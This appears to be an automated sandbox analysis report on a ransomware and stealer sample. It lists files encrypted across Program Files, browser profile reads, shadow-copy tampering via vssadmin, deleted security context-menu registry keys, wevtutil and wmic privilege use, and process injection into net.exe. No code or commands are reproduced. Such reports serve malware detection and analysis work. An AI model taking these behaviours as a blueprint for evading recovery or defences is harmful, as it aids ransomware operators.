File opened for modification C:\Users\Admin\Pictures\SubmitOpen.png.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_zJEq2wjIOyY0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\plugin.js.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_obhWKhFTuLo0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\fonts\LucidaBrightDemiItalic.ttf.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_RDhSc56wBVE0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\OneNoteSectionGroupMedTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\large\wfh.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\TrafficHub\contrast-white\LargeTile.scale-100.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\System\Ole DB\fr-FR\msdaorar.dll.mui.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_ro-bXZoO6bQ0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdVL_KMS_Client-ul.xrm-ms.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_BRdfIGodR2g0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Western\western_13s.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\cc_16x11.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-up.gif.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_wlYSDYHTp-00.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\images\cursors\cursors.properties.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_SuH2a19fxdY0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository_1.1.300.v20131211-1531.jar.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_iBfE7dIDHt40.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\manifestAssets\contrast-black\Square44x44Logo.targetsize-16_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\176.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\cardsLoadingSequence.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Assets\contrast-white\Logo.scale-100_contrast-white.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarSmallTile.scale-100.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\6918_40x40x32.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\nb-no\ui-strings.js.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_0iYS1xh8QEk0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\themes\dark\adobe_logo.png.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_yARMXAq_nvc0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\Common Files\System\ado\ja-JP\msader15.dll.mui C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-execution_zh_CN.jar.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_QnDoyUOAMTA0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\af_60x42.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\Assets\contrast-white\iheart-radio.scale-100_contrast-white.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\ThemeCreation\Show.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Car\RTL\contrast-black\MedTile.scale-125.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\aic_file_icons_retina_thumb_new.png.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_OrsbQ7oYGzw0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\selector.js.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_UdsIOjMaAKM0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdO365R_SubTrial-pl.xrm-ms.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_R5jg0NSrpA00.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-125_8wekyb3d8bbwe\Assets\WideLogo.scale-125.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.OneConnect_2.1701.277.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\OneConnectBadgeLogo.scale-100.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_folder-focus_32.svg.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_ZAIAIMcrQys0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.StarClub\Assets\Animation\unlocking-animation-187x169.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_empty_state.svg.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_28CaMP9IMzM0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\nl-nl\ui-strings.js.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_1OW5KVgw_M80.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\nl_get.svg.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_Y2Y2zzxCJBs0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-jvm.xml.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_j5SVvt6PHv40.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\177.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageAppList.targetsize-36_contrast-white.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.NET.Native.Framework.1.3_1.3.24201.0_x86__8wekyb3d8bbwe\AppxMetadata\CodeIntegrity.cat C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\MANIFEST.MF.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_bO-IqtT12240.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Windows.Photos_16.511.8780.0_neutral_split.scale-100_8wekyb3d8bbwe\Lumia.ViewerPlugin\Assets\IconEditRichCapture.scale-100.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-white\PeopleWideTile.scale-125.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe\Assets\contrast-black\PeopleLargeTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\ExchangeLargeTile.scale-100.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_XabFKKF90ys0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\Voices\beeps\uncommon.lua C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\Snooze.scale-80.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_wt0cMuQ9gKk0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_25.25.13009.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\GamesXboxHubAppList.scale-200_contrast-white.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\SharpDXEngine\Rendering\Shaders\Builtin\HLSL\TexturedColored.fx C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\6536_32x32x32.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\LTR\MedTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarAppList.targetsize-36_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_zh_CN.properties.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_IaofxGLGhGc0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jetty.server_8.1.14.v20131031.jar.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_w_55QkPBUmk0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\XLMACRO.CHM.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_hFw4qPprcfw0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\LinkedInboxSmallTile.scale-150.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\StopwatchLargeTile.scale-125.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxCalendarLogoExtensions.scale-32.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Assets\SkypeAppList.targetsize-16_contrast-white.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.targetsize-32_altform-unplated_contrast-white.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\EMLAttachmentIcon.png C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\hr-hr\ui-strings.js.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_5VoCNMUwgMM0.8zvpm C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe N/A

Launches sc.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A

Modifies registry class

Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP C:\Windows\SYSTEM32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP C:\Windows\SYSTEM32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP C:\Windows\SYSTEM32\reg.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2940 wrote to memory of 3164 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\net.exe
PID 2940 wrote to memory of 3164 N/A C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe C:\Windows\SYSTEM32\net.exe
PID 3164 wrote to memory of 672 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3164 wrote to memory of 672 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
